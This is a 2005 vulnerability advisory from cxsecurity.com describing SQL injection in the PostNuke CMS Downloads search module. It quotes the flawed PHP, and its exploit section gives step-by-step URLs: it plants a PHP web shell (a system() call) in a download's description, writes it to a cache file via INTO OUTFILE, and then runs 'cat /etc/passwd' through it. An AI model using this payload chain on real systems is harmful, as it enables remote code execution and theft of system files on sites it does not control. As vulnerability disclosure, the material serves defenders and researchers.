PostNuke SQL Injection 0.760-RC2=>x

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3] Author: Maksymilian Arciemowicz Date: 20.2.2005 from cxsecurity.com TEAM - --- 0.Description --- PostNuke: The Phoenix Release (0.750) and (0.760-RC2) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Sql Injection --- This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search() Vulnerabilities code: - -51-68--- if ($show!="") { $downloadsresults = $show; } else { $show=$downloadsresults; } //$query = stripslashes($query); $column = &$pntable['downloads_downloads_column']; $sql = "SELECT $column[lid], $column[cid], $column[sid], $column[title], $column[url], $column[description], $column[date], $column[hits], $column[downloadratingsummary], $column[totalvotes], $column[totalcomments], $column[filesize], $column[version], $column[homepage] FROM $pntable[downloads_downloads] WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%' OR $column[description] LIKE '%".pnVarPrepForStore($query)."%' ORDER BY $pntable[downloads_downloads].$orderby"; $result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min); - -51-68--- Error exist in varible $show. Go to this url to view error: http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3 Error message : - --------------- Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74 - --------------- Because this sql injection is after ORDER BY.. we can not use UNION etc. But check this exploit. Exploit Check dir for PostNuke. http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3 Error message : - --------------- Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74 - --------------- For exemple prefix is /www/PostNuke-0.760-RC2/html/. Now add new download and insert to "Description" or "Home page" php code. For example add: - --- <? system($_GET[cx]); ?> - --- And when this download exist in db, go to: http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/* and now for example.. http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd ;] - --- 2. Sql Error --- This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search() Vulnerabilities code: - -46-68--- if(isset($orderby)) { $orderby = convertorderbyin($orderby); } else { $orderby = $pntable['downloads_downloads_column']['title'] . ' ASC'; } if ($show!="") { $downloadsresults = $show; } else { $show=$downloadsresults; } //$query = stripslashes($query); $column = &$pntable['downloads_downloads_column']; $sql = "SELECT $column[lid], $column[cid], $column[sid], $column[title], $column[url], $column[description], $column[date], $column[hits], $column[downloadratingsummary], $column[totalvotes], $column[totalcomments], $column[filesize], $column[version], $column[homepage] FROM $pntable[downloads_downloads] WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%' OR $column[description] LIKE '%".pnVarPrepForStore($query)."%' ORDER BY $pntable[downloads_downloads].$orderby"; $result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min); - -46-68--- Error exist in: - --- $orderby = convertorderbyin($orderby); - --- and sql querty is: - --- SELECT pn_downloads_downloads.pn_lid, pn_downloads_downloads.pn_cid, pn_downloads_downloads.pn_sid, pn_downloads_downloads.pn_title, pn_downloads_downloads.pn_url, pn_downloads_downloads.pn_description, pn_downloads_downloads.pn_date, pn_downloads_downloads.pn_hits, pn_downloads_downloads.pn_ratingsummary, pn_downloads_downloads.pn_totalvotes, pn_downloads_downloads.pn_totalcomments, pn_downloads_downloads.pn_filesize, pn_downloads_downloads.pn_version, pn_downloads_downloads.pn_homepage FROM pn_downloads_downloads WHERE pn_downloads_downloads.pn_title LIKE '%%' OR pn_downloads_downloads.pn_description LIKE '%%' ORDER BY pn_downloads_downloads. - --- Url: http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby= - --- 3. How to fix --- Download the new version of the script or update. - --- 4.Contact --- Author: Maksymilian Arciemowicz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top